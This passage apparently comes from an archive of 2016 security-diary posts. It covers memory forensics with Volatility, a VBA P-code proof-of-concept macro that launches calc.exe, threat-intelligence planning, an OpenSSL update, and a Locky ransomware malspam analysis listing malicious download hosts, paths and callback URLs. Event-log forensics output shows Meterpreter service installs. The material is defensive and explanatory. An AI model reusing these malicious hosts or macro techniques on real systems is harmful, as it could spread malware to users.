0x959f010          TCPv4    10.3.58.6:62978                72.14.204.138:80     FIN_WAIT1        7508     chrome.exe
0x29933cf0         TCPv4    10.3.58.6:62979                72.14.204.102:80     FIN_WAIT1        7508     chrome.exe
0x2ac90a50         TCPv4    -:62088                        14.0.33.84:80        CLOSED           7508     chrome.exe
0x4ce8d610         TCPv4    -:62054                        -:80                 CLOSED           7508     chrome.exe
0x578b2430         UDPv6    ::1:53608                      *:*                                   2784     svchost.exe    2012-04-06 13:59:31 UTC+0000
0x58b9ecf0         TCPv4    10.3.58.6:445                  10.3.58.7:2034       ESTABLISHED      4        System
0x5a690290         TCPv4    127.0.0.1:5678                 127.0.0.1:62149      ESTABLISHED      4256     svchost.exe
0x72b40010         TCPv4    10.3.58.6:62854                74.217.78.140:80     FIN_WAIT1        7508     chrome.exe
0x7c488410         UDPv4    127.0.0.1:1900                 *:*                                   2784     svchost.exe    2012-03-20 03:53:45 UTC+0000
0x7c4eaec0         UDPv4    127.0.0.1:53609                *:*                                   2784     svchost.exe    2012-04-06 13:59:31 UTC+0000
0x7c5173c0         TCPv4    10.3.58.6:62795                64.12.152.17:80      FIN_WAIT1        7508     chrome.exe

Now let's check the autoruns using the autoruns plugin:

vol.py -f rawimage.img --profile=Win7SP1x64 autoruns -t autoruns

Autoruns =========================================

Hive: \??\C:\Users\SRL-Helpdesk\ntuser.dat
    Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2012-03-15 21:20:12 UTC+0000)
        Sidebar                        : %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (PIDs: -)

Hive: \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
    Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2009-07-14 04:45:47 UTC+0000)
        Sidebar                        : %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (PIDs: -)
    Software\Microsoft\Windows\CurrentVersion\RunOnce (Last modified: 2010-11-10 18:57:47 UTC+0000)
        mctadmin                       : C:\Windows\System32\mctadmin.exe (PIDs: -)

Hive: \SystemRoot\System32\Config\SOFTWARE
    Microsoft\Windows\CurrentVersion\Run (Last modified: 2011-09-16 20:57:09 UTC+0000)
        VMware User Process            : "C:\Program Files\VMware\VMware Tools\VMwareUser.exe" (PIDs: 8984, 4916)
        VMware Tools                   : "C:\Program Files\VMware\VMware Tools\VMwareTray.exe" (PIDs: 6744, 1844)
        McAfee Host Intrusion Prevention Tray : "C:\Program Files\McAfee\Host Intrusion Prevention\FireTray.exe" (PIDs: -)
    Wow6432Node\Microsoft\Windows\CurrentVersion\Run (Last modified: 2012-04-05 17:53:13 UTC+0000)
        ShStatEXE                      : "C:\Program Files (x86)\McAfee\VirusScan Enterprise\SHSTAT.EXE" /STANDALONE (PIDs: -)
        Adobe Reader Speed Launcher    : "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe" (PIDs: -)
        McAfeeUpdaterUI                : "C:\Program Files (x86)\McAfee\Common Framework\udaterui.exe" /StartedFromRunKey (PIDs: -)
        svchost                        : c:\windows\system32\dllhost\svchost.exe (PIDs: 4256)
        Adobe ARM                      : "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" (PIDs: -)

Hive: \??\C:\Users\vibranium\ntuser.dat
    Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2012-04-05 17:03:53 UTC+0000)
        Sidebar                        : %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (PIDs: -)
    Software\Microsoft\Windows\CurrentVersion\RunOnce (Last modified: 2012-04-05 17:03:53 UTC+0000)
        mctadmin                       : C:\Windows\System32\mctadmin.exe (PIDs: -)

Hive: \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
    Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2009-07-14 04:45:48 UTC+0000)
        Sidebar                        : %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (PIDs: -)
    Software\Microsoft\Windows\CurrentVersion\RunOnce (Last modified: 2010-11-10 18:57:47 UTC+0000)
        mctadmin                       : C:\Windows\System32\mctadmin.exe (PIDs: -)

Hive: \??\C:\Users\nfury\ntuser.dat
    Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2011-08-25 21:51:37 UTC+0000)
        Google Update                  : "C:\Users\nfury\AppData\Local\Google\Update\GoogleUpdate.exe" /c (PIDs: 3968)
        Skype                          : "C:\Program Files (x86)\Skype\Phone\Skype.exe" /nosplash /minimized (PIDs: 3736)
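Reading autoruns output by eye does not scale, so a first triage pass is worth scripting: parse the listing, flag any entry whose binary carries the name of a Windows system executable but does not sit in a system directory, and cross-check the flagged PIDs against the PIDs that own sockets in netscan. The block below is an added example, not part of the diary; the autoruns excerpt is copied from the output above plus one constructed benign 'svchost-control' line, and the netscan PID set is read off the diary's netscan listing. On this data it flags only the svchost entry under dllhost; what that binary is would need further analysis the diary does not go into.

```python
"""Triage pass over Volatility 'autoruns' output: flag Run-key entries whose
binary is named like a Windows system executable but is not in a system
directory, then cross-check against PIDs seen in 'netscan'. Added example,
not part of the diary; the autoruns lines are copied from the output above
(plus one constructed benign line), the netscan PIDs from the diary's listing."""
import ntpath
import re

SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe",
                   "winlogon.exe", "smss.exe", "spoolsv.exe", "wininit.exe", "lsm.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
ENTRY_RE = re.compile(r"^(?P<name>.+?)\s*:\s*(?P<cmd>.+?)\s*\(PIDs:\s*(?P<pids>[^)]*)\)$")


def executable_path(cmdline: str) -> str:
    """First token of a command line, unquoting it if it starts with a quote."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.index('"', 1)]
    return cmdline.split()[0]


def parse_autoruns(text: str) -> list:
    """Return one dict per entry: hive, key, name, path, pids."""
    entries, hive, key = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Hive:"):
            hive = line[len("Hive:"):].strip()
        elif "(Last modified:" in line:
            key = line.split(" (Last modified:")[0]
        elif "(PIDs:" in line:
            m = ENTRY_RE.match(line)
            if m:
                pids = [int(p) for p in re.findall(r"\d+", m["pids"])]
                entries.append({"hive": hive, "key": key, "name": m["name"],
                                "path": executable_path(m["cmd"]), "pids": pids})
    return entries


def masquerading_system_binaries(entries: list) -> list:
    """System-binary names that do not live in a system directory. The exact
    directory match is deliberate: a subfolder of System32 still counts."""
    hits = []
    for e in entries:
        path = e["path"].lower()
        if ntpath.basename(path) in SYSTEM_BINARIES and ntpath.dirname(path) not in SYSTEM_DIRS:
            hits.append(e)
    return hits


def with_network_activity(hits: list, netscan_pids: set) -> list:
    """Keep only flagged entries whose PID also owns a socket in netscan."""
    return [e for e in hits if set(e["pids"]) & netscan_pids]


# excerpt of the diary's autoruns output; the 'svchost-control' line is a
# constructed benign control showing that the real System32 path is not flagged
AUTORUNS_EXCERPT = r"""
Hive: \SystemRoot\System32\Config\SOFTWARE
    Microsoft\Windows\CurrentVersion\Run (Last modified: 2011-09-16 20:57:09 UTC+0000)
        VMware User Process            : "C:\Program Files\VMware\VMware Tools\VMwareUser.exe" (PIDs: 8984, 4916)
    Wow6432Node\Microsoft\Windows\CurrentVersion\Run (Last modified: 2012-04-05 17:53:13 UTC+0000)
        ShStatEXE                      : "C:\Program Files (x86)\McAfee\VirusScan Enterprise\SHSTAT.EXE" /STANDALONE (PIDs: -)
        svchost                        : c:\windows\system32\dllhost\svchost.exe (PIDs: 4256)
        svchost-control                : C:\Windows\System32\svchost.exe -k netsvcs (PIDs: 612)
Hive: \??\C:\Users\nfury\ntuser.dat
    Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2011-08-25 21:51:37 UTC+0000)
        Skype                          : "C:\Program Files (x86)\Skype\Phone\Skype.exe" /nosplash /minimized (PIDs: 3736)
"""
# PIDs owning sockets in the diary's netscan output
NETSCAN_PIDS = {3736, 7508, 2784, 4, 4256}

if __name__ == "__main__":
    flagged = masquerading_system_binaries(parse_autoruns(AUTORUNS_EXCERPT))
    for e in with_network_activity(flagged, NETSCAN_PIDS):
        print(e["hive"], e["key"], e["name"], e["path"], e["pids"])
```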


[1] http://www.forensicswiki.org/wiki/Hiberfil.sys
[2] https://github.com/libyal/libvshadow
[3] https://comae.typeform.com/to/XIvMa7


Published: 2016-09-26

VBA and P-code

I want to draw your attention to some great work Dr. Bontchev did.

pcodedmp.py is a VBA P-code disassembler. Microsoft Office documents contain VBA macros in several forms. They contain the source code, but also compiled P-code. Dr. Bontchev created a proof-of-concept document that executes P-code and does not contain the corresponding source code. Here is the output from his pcodedmp.py tool for his PoC document:

python pcodedmp.py -d poc2b.doc

Processing file: poc2b.doc
===============================================================================
Module streams:
Macros/VBA/ThisDocument - 1949 bytes
Line #0:
        FuncDefn (Sub / Property Set) func_00000078
Line #1:
        LitStr 0x001D "This could have been a virus!"
        Ld vbInformation
        Ld vbOKOnly
        Add
        LitStr 0x0006 "Virus!"
        ArgsCall MsgBox 0x0003
Line #2:
        LitStr 0x0008 "calc.exe"
        Paren
        ArgsCall Shell 0x0001
Line #3:
        EndSub

 

Dr. Bontchev also coded a plugin for oledump.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com


Published: 2016-09-25

Defining Threat Intelligence Requirements

Introduction

Setting up the requirements is the first task to be completed before investing time in researching and collecting any type of intelligence. However, in many conversations on the topic I have taken part in, requirements are too often confused with "which tool do we need?" and "how many people do we need?" While these parameters are part of the equation, the main goal of setting the requirements is to understand which type of information is of interest for a given organization. This is because there are mainly two issues:

  • The overall amount of information received from different sources (e.g. sharing groups, feeds, etc.) is huge, and a big part of it is not relevant to your organization;
  • Even if you focused only on the information that interests your organization, most of the time that amount of data would still be well over the analysts' capacity.

Therefore a proper model has to define the requirements and also their priority, to make sure that the most relevant and most critical information is processed and not lost in the noise.
I like to split the types of requirements in three different groups:

  • High Level Requirements
    • As the name suggests, these are general requirements like defining what type of threat actor is of interest, understanding which are the business industries of operation, etc.
  • Functional Requirements
    • These are more practical and technical requirements, based on what type of infrastructure your organization has.
  • Capability/Visibility Requirements
    • This is literally what information the analyst needs to have access to, in order to get the proper internal visibility needed to meet the requirements defined in the previous two categories.

Defining Threat Intelligence Requirements

Following are the three types of requirements explained in (slightly) more detail, to give an example of what each one means. This list is not meant to be exhaustive, but rather to set an initial direction that will have to be tailored to your specific organization.

High Level Requirements

  • Countries of Operation
    • This is a very high level one. The granularity has to be defined. It could refer just to the macro regions of operation (quite high level, though, for big organizations), to each country where major operational branches are, or to each country where the organization has a presence (even with small branches).
      • E.g. if your organization has no presence/business in Asia or country X, you may not be interested in activities targeting specifically that region/country.
      • E.g. actions led by this could be blocking traffic towards countries your organization has no business with (and/or generating an alert).
         
  • Business Industries of Operation
    • The core business of the company (e.g. insurance, bank/finance, manufacturing, energy, etc.) is obviously known and the first to start with.
    • This point also refers to understanding all other secondary (but relevant) industries your company is involved in and/or possesses sensitive information about;
      • E.g. your organization (e.g. core business finance) is also involved in oil plants, with access to blueprints for business reasons. Are there groups after these specific IP/info? Which ones?
         
  • Business Top Critical Assets
    • Assets refers both to the types of data that are critical for the organization (credit card and financial account data, personally identifiable information, intellectual property, confidential business information, credentials and IT system information) and to the operational systems whose availability is business critical.
       
  • What type of Adversary may be targeting your business?
    • E.g. Hacktivist, Organized Crime, Corporate Espionage, Nation-State, etc.
       
  • Who will consume the Intelligence you collect/produce?
    • SOC analysts, CISO, etc., to understand whether you need to collect/produce technical, tactical and/or strategic intelligence.
       

Functional Requirements

  • Physical external/perimeter exposure
    • Servers facing external network: 
      • What services are publicly exposed? What OS version do they run? What DB + version? Etc. (selecting those of major importance first)
    • Which devices are reachable from the outside?
      • E.g. printers with remote maintenance access.
         
  • Physical internal exposure
    • What systems do you use internally (i.e. that have access to the internal network)?
      • Windows / OSX / *nix ? Which version?
      • Mobile?
    • What software/version do you use internally? (IE, Outlook, Flash, etc.). Are there unpatched vulnerabilities to be monitored? Are any of those being exploited in the wild?
    • What type of attachments do you allow? What types of file are allowed to be downloaded from the internal network?
    • Network infrastructure (yes, that famous diagram no one ever has)
       
  • What type of attacks/threats does your organization fear most?
    • DDoS attacks
    • Banking Trojan
    • Drive-by / EK
    • Credentials' Phishing
    • Intellectual Property (IP) exfiltration
    • Etc.
       

Capability/Visibility Requirements

The best intelligence is the one you can gather from your own environment, and higher visibility into your environment will let you use information and tools more efficiently. Following are the resources needed to have visibility into the data required to fulfill those requirements.

  • Email logs
    • As a basic requirement, it is of paramount importance to be able to access all email logs, containing timestamp, sender, recipient, subject, attachment name(s) and attachment hash value(s).
    • Being able to access the quarantined attachments, or having an address where malicious emails can be forwarded for automatic processing in a safe environment;
    • Having access to the email headers as well would be a great plus.
       
  • Network: Proxylogs, Firewall logs, IDS logs, DNS logs, etc.
     
  • Passive DNS
    • Another must have is a passive DNS: collect all DNS resolutions ever made by any machine within your network;
    • Third-party pDNS: always useful to get a broader view.
       
  • Endpoint visibility
    • Being able to search/collect information and artifacts from endpoints (i.e. memory, registry hives, running processes, etc.)
       
  • External feeds and sources
    • Free/Paid feeds of indicators
    • Hopefully each analyst belongs to one or more trusted sharing communities, which are usually not public. If not, create your network of trusted peers, this is a must have for an analyst.
       
  • Centralized storage and correlation
    • This may be a full-fledged Threat Intelligence Platform (TIP) or an Excel spreadsheet
    • Useful as a central collection point for the collected intel.
    • Ideally it can be integrated with other internal tools to allow automation
       

Action Plan

The following is a list of actions to take, which is mapped on the above requirements:

  1. Enumerate your environment (functional requirements: internal and external exposure)
  2. Evaluate your most critical assets the business wants you to protect (high level requirements: business top critical asset).
  3. Identify your Adversaries (high level requirements: what type of adversary may target our business)
  4. Prioritize the type of attacks/threats most dangerous for the business (functional requirements: what type of attacks/threats do you fear?)
  5. Identify the main countries and especially business industries of operation (high level requirements: countries and business industries of operation)
  6. Identify who will be the TI consumers (high level requirements: who will consume the TI?)

Once it is clear what you need to protect and what type of information needs to be collected, it is time to move to the "capability/visibility requirements”, keeping in mind what information you need in order to cover all the requirements defined above.

We have already mentioned that the first and best intelligence feeds you can get are from your own internal environment. Specifically, as also mentioned by Scott J. Roberts in his blog [1], starting from the analysis of your past incidents can immediately give you a good indication about your requirements. Do those incidents fit into the requirements you have set? If not, refine them. From the past incidents it will also be possible to check how mature the capability/visibility requirements are. If that incident happened again, would you be able to either prevent or detect it? The requirements will tell you.
Last but not least, remember that this is an iterative process and all those requirements need to be reviewed and refined periodically, because the threat landscape will change, and the organization's infrastructure and/or secondary business industries may change as well. How often? This is really tailored to the organization (e.g. every 6 or 12 months).

Did you define your TI requirements? What approach did you use? Please share your experience.

Happy Hunting,

Pasquale

 

References and Suggested Readings
[1] – Scott J. Roberts, "CTI SquadGoals - Setting Requirements", https://sroberts.github.io/2016/03/30/cti-squad-goals-intro-to-requirements/
[2] – CIA, "A Fresh Look at Collection Requirements", https://www.cia.gov/library/center-for-the-study-of-intelligence/kent-csi/vol4no4/html/v04i4a03p_0001.htm
[3] – Scott J. Roberts, "Intelligence Collection Priorities", https://sroberts.github.io/2016/07/26/intelligence-collection-priorities

 

0 Comments

Published: 2016-09-24

.PUB Analysis

Xavier reported a maldoc campaign using Microsoft Publisher files. These files can be analyzed just like malicious Word files.

oledump.py reveals VBA macros in this sample:

The VBA macro contains calls to the chr function. This could encode a URL or some other payload:

If you want more details, I made this video.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

1 Comments

Published: 2016-09-22

YAHDD! (Yet another HUGE data Breach!)

It looks like Yahoo! is the latest victim of a large scale data breach.  It looks like the released data dates back to at least 2014 and contains more than 500 Million user accounts, so if you haven't changed your Yahoo! password in the last couple of years then it is time.

As one of the other ISC Handlers pointed out...not all Yahoo! customers may know they are Yahoo! customers. Yahoo! white labels email services on behalf of ISPs and email providers. I assume those white label providers will need to do notifications to their customers as well?

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

0 Comments

Published: 2016-09-22

The era of big DDOS?

I have been tracking DDOS's for a number of years, and quite frankly, it has become boring.  Don't get me wrong, I am not complaining, just stating a fact.  A number of factors seem to have contributed to its fall from mainstream consciousness.  Some of these factors being; somewhat better filtering practices, more awareness of timely patching, and probably the most significant being the novelty has worn off.  Occasionally I will still see a multi-Gbps DDOS, but mostly it has been relegated to booter traffic which is not even a nuisance for most providers.

Over the last few days though there have been two very significant DDOS events.  Firstly, on Tuesday, Sep 20, hosting company OVH was hit with a DDOS which peaked near the 1Tbps range, and also on Tuesday evening (Sep 20), InfoSec journalist Brian Krebs' website was hit with a DDOS peaking at over 600 Gbps.

These are believed to be the two largest DDOS attacks on record and significantly exceed what it was believed could be achieved by any one DDOS group.

While the nature of the DDOS attack traffic used against OVH has not been revealed, the attack against Brian Krebs' site is unusual in that the traffic is not your typical reflective UDP DDOS traffic, but rather TCP traffic that made connections with the web server and GRE (generic routing encapsulation) packets.  The reason why this is unusual is that this traffic cannot be spoofed, but rather an analysis of the traffic should reveal which devices were used to launch the attack.

Is this a sign that big DDOS is making a comeback or just a couple of isolated attacks?

 

UPDATE: It appears Akamai is not happy with the extra excitement hosting Brian Krebs' site is bringing them.  Brian is looking for a new hosting provider.

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

6 Comments

Published: 2016-09-22

OpenSSL Update Released

As announced earlier this week, OpenSSL released an update today for all currently supported versions (1.0.1, 1.0.2, 1.1.0).

The update fixes 14 different vulnerabilities. Only one vulnerability is rated "High". This vulnerability, CVE-2016-6304, can lead to memory exhaustion and a denial of service if the client sends multiple large OCSP requests.

With this update, the latest versions of OpenSSL for the various branches are 1.0.1u, 1.0.2i and 1.1.0a. All three branches are currently supported.

The table below shows which vulnerabilities apply to each branch.

CVE            Description                                                    Rating    1.0.1  1.0.2  1.1.0
-------------  -------------------------------------------------------------  --------  -----  -----  -----
CVE-2016-6304  OCSP Status Request extension unbounded memory growth          High      x      x      x
CVE-2016-6305  SSL_peek() hang on empty record                                Moderate                x
CVE-2016-2183  SWEET32 Mitigation                                             Low       x      x
CVE-2016-6303  OOB write in MDC2_Update()                                     Low       x      x
CVE-2016-6302  Malformed SHA512 ticket DoS                                    Low       x      x
CVE-2016-2182  OOB write in BN_bn2dec()                                       Low       x      x
CVE-2016-2180  OOB read in TS_OBJ_print_bio()                                 Low       x      x
CVE-2016-2177  Pointer arithmetic undefined behaviour                         Low       x      x
CVE-2016-2178  Constant time flag not preserved in DSA signing                Low       x      x
CVE-2016-2179  DTLS buffered message DoS                                      Low       x      x
CVE-2016-2181  DTLS replay protection DoS                                     Low       x      x
CVE-2016-6306  Certificate message OOB reads                                  Low       x      x
CVE-2016-6307  Excessive allocation of memory in tls_get_message_header()     Low                     x
CVE-2016-6308  Excessive allocation of memory in dtls1_preprocess_fragment()  Low                     x

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

 

2 Comments

Published: 2016-09-21

Those never-ending waves of Locky malspam

Introduction

Malicious spam (malspam) campaigns sending Locky ransomware are nothing new.  We see reports of it on a near daily basis [1, 2].  But last month, Locky ransomware changed.  It used to be downloaded as an executable file, but now it's being implemented as a DLL [3].  I looked into Locky earlier this month and reported some data on my personal blog [4].  As common as Locky malspam is, I think this near-daily phenomenon deserves another round of investigation.

For this diary, I reviewed 20 samples of Locky malspam found on Tuesday 2016-09-20.  The image below shows samples of the various senders and subject lines.

The emails


Shown above:  Various senders and subject lines from Locky malspam on Tuesday, 2016-09-20.

The malspam all contained zip archives as file attachments.  Those zip archives contained either a .js file or a .wsf file.  The .js files contain JavaScript and can be run with Windows Script Host by double-clicking the file.  The .wsf file extension is used for a Windows Script File.  These .wsf files can also be run by double-clicking on them in a Windows environment.

These .js and .wsf files are designed to download Locky and run the ransomware as a DLL.


Shown above:  The attachments, extracted files, and associated Locky ransomware DLLs.

Screenshots of the emails

The malicious script files

We can examine the script files after extracting them from the zip archives attached to the emails.  The .js files and the .wsf files may use different formats and syntax, but they are both highly-obfuscated, and they are both designed to download and install the Locky ransomware.


Shown above:  Extracted .js file from one of the attachments.


Shown above:  Extracted .wsf file from one of the attachments.

Chain of events

All 20 samples are designed to infect computers with Locky ransomware, but there are some differences.  I saw the same chain of events with all the .js files.  But I saw a different chain of events with the .wsf files.

The biggest difference?  Locky samples downloaded by the .js files generated post-infection callback traffic.  Locky samples from the .wsf files did not.


Shown above:  Chain of events from the different types of malicious script files.

Traffic

Traffic is still typical of Locky infection from malspam.  In traffic generated by the .js files, I saw a single Locky download followed by post-infection callback traffic.  In traffic from the .wsf files, I saw three downloads of Locky without any post-infection traffic.  In both cases, the Windows host still provided the typical indicators of a Locky infection.


Shown above:  An example of traffic generated by a .js file.


Shown above:  An example of traffic generated by a .wsf file.


Shown above:  An infected Windows host from either type of malicious script (.js or .wsf).

Both types of malicious script file download Locky as an encrypted or obfuscated binary from a web server, then it's decrypted on the local host.


Shown above:  The encrypted Locky binary downloaded from a web server.


Shown above:  Downloaded binary and decoded Locky DLL on the local host.

Indicators of compromise (IOCs)

The first batch of .js files from Locky malspam with the subject line "Tracking data" generated the following traffic: 

Locky download:

  • 95.173.164.205 port 80 - vetchsoda.org - GET /5pnqv2
  • 178.212.131.10 port 80 - solenapeak.com - GET /2zg3kl
  • 178.212.131.10 port 80 - solenapeak.com - GET /fs3e3a
  • 178.212.131.10 port 80 - solenapeak.com - GET /ha4n2

Post-infection callback:

  • 46.38.52.225 port 80 - 46.38.52.225 - POST /data/info.php

By the time I checked the first two batches of .wsf files from Locky malspam, I didn't get any HTTP traffic.  However, these .wsf files changed the victim's preferred DNS server to 167.114.34.61 and generated DNS queries for the following domains:

  • 167.114.34.61 port 53 - DNS query for writewile.su (response: Server failure)
  • 167.114.34.61 port 53 - DNS query for steyjixie.net (response: Server failure)
  • 167.114.34.61 port 53 - DNS query for wellyzimme.com (response: Server failure)

The second batch of .js files from Locky malspam with the subject line "Out of stock" generated the following traffic: 


Post-infection callback:

  • 46.38.52.225 port 80 - 46.38.52.225 - POST /data/info.php
  • 109.248.59.80 port 80 - 109.248.59.80 - POST /data/info.php

The last batch of .wsf files came from Locky malspam disguised as a receipt from The Music Zoo.  Unlike the first two batches of .wsf files, these caused a proper Locky infection, but they didn't generate any Locky post-infection traffic.  Like the earlier .wsf files, this batch changed the victim's preferred DNS server to 167.114.34.61 and used that for any DNS queries.  Examples of traffic from these .wsf files are:


The infected host

Locky caused by this malspam is the Zepto variant.  All the encrypted files have the .zepto file extension.


Shown above:  Encrypted files with the .zepto file extension.

 

Checking the decryptor page through the Tor network, you'll find the standard Locky description.  The ransom payment is 3 bitcoins, which is approximately 1,800 US dollars.


Shown above:  The Locky decryptor page.


Shown above:  Ransom stated as 3 bitcoins.

Final words

Ransomware like Locky continues to be a well-known threat.  Fortunately these waves of malspam are usually blocked for most organizations using any decent email security and spam filtering.  Furthermore, properly-administered Windows hosts are not likely to be infected.

So why examine these emails?

Because some of these emails make it through, and people still get infected.  All it takes is one message, one Windows host without enough protective measures, and one person willing to start clicking away.

A solid strategy for any sort of ransomware is to make regular backups of any important files.  Remember to test those backups, so you're certain to recover your data.

Pcap and malware for this diary are located here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

References:

[1] http://blog.dynamoo.com/search/label/Locky/
[2] https://myonlinesecurity.co.uk/tag/locky/
[3] http://www.bleepingcomputer.com/news/security/locky-zepto-ransomware-now-being-installed-from-a-dll/
[4] http://malware-traffic-analysis.net/2016/09/12/index.html

1 Comments

Published: 2016-09-20

Windows Events log for IR/Forensics ,Part 2

In a previous diary [i] I talked about Windows Events and gave some examples of the most useful events for Forensics/IR. In this diary I will talk about how to use Windows PowerShell to search for events.

Get-WinEvent

“The Get-WinEvent cmdlet gets events from event logs, including classic logs, such as the System and Application logs, and the event logs that are generated by the Windows Event Log technology introduced in Windows Vista. It also gets events in log files generated by Event Tracing for Windows (ETW).”[ii]

 

 

And here are some examples:

Get-winevent -logname System

 

This command would show everything in the System event log, which might be very large and will show many things that might not be important to our case.

The best way to filter events with the Get-WinEvent cmdlet is the FilterHashtable parameter. Suppose that you are interested only in the events related to a new service creation (event id 7045):

Get-WinEvent -FilterHashtable @{logname='system' ; id=7045} | format-list

 

And output would be similar to this

TimeCreated  : 9/16/2016 12:57:58 AM
ProviderName : Service Control Manager
Id           : 7045
Message      : A service was installed in the system.

               Service Name:  Meterpreter
               Service File Name:  "C:\Windows\TEMP\hXdIEXeEbqqzDy\metsvc.exe" service
               Service Type:  user mode service
               Service Start Type:  auto start
               Service Account:  LocalSystem

TimeCreated  : 9/16/2016 12:56:46 AM
ProviderName : Service Control Manager
Id           : 7045
Message      : A service was installed in the system.

               Service Name:  vvgQjBPVHmgKnFfH
               Service File Name:  %SYSTEMROOT%\AmEAdtHt.exe
               Service Type:  user mode service
               Service Start Type:  demand start
               Service Account:  LocalSystem

TimeCreated  : 9/16/2016 12:54:14 AM
ProviderName : Service Control Manager
Id           : 7045
Message      : A service was installed in the system.

               Service Name:  jJZzbNmqBqTeqzsU
               Service File Name:  %SYSTEMROOT%\bFZwMEQv.exe
               Service Type:  user mode service
               Service Start Type:  demand start
               Service Account:  LocalSystem

TimeCreated  : 9/16/2016 12:39:34 AM
ProviderName : Service Control Manager
Id           : 7045
Message      : A service was installed in the system.

               Service Name:  zNvHlQahvTqmPpVS
               Service File Name:  %SYSTEMROOT%\cEYBVJNP.exe
               Service Type:  user mode service
               Service Start Type:  demand start
               Service Account:  LocalSystem

TimeCreated  : 9/15/2016 9:09:40 PM
ProviderName : Service Control Manager
Id           : 7045
Message      : A service was installed in the system.

               Service Name:  vJcYxfCDYUgOZiVb
               Service File Name:  %SYSTEMROOT%\TifTyNVa.exe
               Service Type:  user mode service
               Service Start Type:  demand start
               Service Account:  LocalSystem

 

 

As you can see from the sample, many services with suspicious names have been installed on the system.

Again we can check our events to see who was logged on around that time:

Get-WinEvent -FilterHashtable @{logname='security'; id=4624; starttime='9/15/2016 9:00:00 PM'; endtime='9/15/2016 9:09:40 PM'} | format-list

 

And here is the output

TimeCreated  : 9/15/2016 9:09:39 PM
ProviderName : Microsoft-Windows-Security-Auditing
Id           : 4624
Message      : An account was successfully logged on.

               Subject:
                   Security ID:        S-1-0-0
                   Account Name:        -
                   Account Domain:        -
                   Logon ID:        0x0

               Logon Type:            3

               New Logon:
                   Security ID:        S-1-5-21-574956201-2274518538-2668157362-1004
                   Account Name:        test
                   Account Domain:        WIN-CAR8AFQU4IJ
                   Logon ID:        0x112fd1
                   Logon GUID:        {00000000-0000-0000-0000-000000000000}

               Process Information:
                   Process ID:        0x0
                   Process Name:        -

               Network Information:
                   Workstation Name:    BH5vQpSXNj4EBCBk
                   Source Network Address:    10.10.75.1
                   Source Port:        55165

               Detailed Authentication Information:
                   Logon Process:        NtLmSsp
                   Authentication Package:    NTLM
                   Transited Services:    -
                   Package Name (NTLM only):    NTLM V2
                   Key Length:        0

 

From the above output we find out that a user named "test" logged on at 9/15/2016 9:09:39 PM via the network (Logon Type: 3) from the IP address 10.10.75.1.

Now let's find out when the user "test" was created:

Get-WinEvent -FilterHashtable @{logname='Security' ; ID=4720} | where {$_.message -match "test"} | fl

 

And here is the output

 

TimeCreated  : 8/12/2016 10:06:33 PM
ProviderName : Microsoft-Windows-Security-Auditing
Id           : 4720
Message      : A user account was created.

               Subject:
                   Security ID:        S-1-5-21-574956201-2274518538-2668157362-1000
                   Account Name:        Victim
                   Account Domain:        WIN-CAR8AFQU4IJ
                   Logon ID:        0x275eb2

               New Account:
                   Security ID:        S-1-5-21-574956201-2274518538-2668157362-1004
                   Account Name:        test
                   Account Domain:        WIN-CAR8AFQU4IJ

               Attributes:
                   SAM Account Name:    test
                   Display Name:
                   User Principal Name:    -
                   Home Directory:
                   Home Drive:
                   Script Path:
                   Profile Path:
                   User Workstations:
                   Password Last Set:
                   Account Expires:
                   Primary Group ID:    513
                   Allowed To Delegate To:    -
                   Old UAC Value:        0x0
                   New UAC Value:        0x15
                   User Account Control:
                       Account Disabled
                       'Password Not Required' - Enabled
                       'Normal Account' - Enabled
                   User Parameters:
                   SID History:        -
                   Logon Hours:        All

               Additional Information:
                   Privileges        -

 

Now let's see if there are any other logon attempts via the network. For this task I would use Get-EventLog:

Get-EventLog -LogName security | where {$_.eventid -eq 4624} | where {$_.replacementstrings[8] -eq 3} | select timegenerated ,@{Name='AccountName';Expression={$_.replacementstrings[5]}},@{Name='IP Address';Expression={$_.replacementstrings[-2]}} | export-csv c:\users\user\type3logon.csv

Get-EventLog stores the event's fields in an array called ReplacementStrings: the logon type is stored at index [8], the user name at index [5] and the IP address at index [-2].

Now let's see what other logon types we have and how many attempts for each:

Get-EventLog -LogName security | where {$_.EventID -eq 4624} | Group-Object {$_.Replacementstrings[8]} | select name,count

 

Name                Count
----                -----
7                       2
5                     210
2                      29
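As an added example (not part of this diary), the following PowerShell turns the manual steps above into reusable functions: it pulls 7045 service-install events and 4624 logons with Get-WinEvent, reads the fields from each event's XML by name (ServiceName, ImagePath, LogonType, TargetUserName, IpAddress) instead of by ReplacementStrings position, which shifts between Windows versions, and lists the network logons that preceded each suspicious service install. The function names and the "suspicious" heuristics are my own, modelled on the sample output above; reading the Security log requires an elevated shell.

```powershell
# Added example, not part of the original diary. Function names are my own.
# Run in an elevated PowerShell session: the Security log needs admin rights.

# Turn an event's <EventData> into a hashtable keyed by each Data element's Name
# attribute, so fields are read by name instead of by ReplacementStrings index.
function ConvertFrom-EventData {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
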